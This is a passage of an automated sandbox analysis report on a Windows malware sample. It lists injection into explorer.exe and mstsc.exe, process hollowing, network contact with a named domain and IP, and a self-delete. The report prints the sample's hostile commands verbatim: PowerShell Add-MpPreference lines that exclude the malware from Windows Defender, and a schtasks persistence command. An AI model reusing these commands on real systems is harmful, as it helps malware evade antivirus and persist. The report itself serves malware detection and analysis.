          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0504138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05007794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05007794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05007794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05055BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0503FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05014257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0503B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0503B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05058A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F98794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.safifinancial.info
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          .NET source code references suspicious native API functionsShow sources
          Source: Ms5nQdSz5l.exe, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: Ms5nQdSz5l.exe, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: zFVxYeAVOjnwuB.exe.0.dr, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: zFVxYeAVOjnwuB.exe.0.dr, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 0.0.Ms5nQdSz5l.exe.c40000.0.unpack, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 0.0.Ms5nQdSz5l.exe.c40000.0.unpack, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 0.2.Ms5nQdSz5l.exe.c40000.0.unpack, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 0.2.Ms5nQdSz5l.exe.c40000.0.unpack, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 9.0.Ms5nQdSz5l.exe.620000.0.unpack, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 9.0.Ms5nQdSz5l.exe.620000.0.unpack, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 9.2.Ms5nQdSz5l.exe.620000.1.unpack, Memory.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 9.2.Ms5nQdSz5l.exe.620000.1.unpack, ProcessClass.csReference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeMemory written: C:\Users\user\Desktop\Ms5nQdSz5l.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: C70000
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Users\user\Desktop\Ms5nQdSz5l.exe C:\Users\user\Desktop\Ms5nQdSz5l.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: explorer.exe, 0000000B.00000000.330501605.00000000089FF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.251142593.0000000001640000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.251142593.0000000001640000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 0000000B.00000002.496125004.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 0000000B.00000000.251142593.0000000001640000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 0000000B.00000000.251142593.0000000001640000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeQueries volume information: C:\Users\user\Desktop\Ms5nQdSz5l.exe VolumeInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
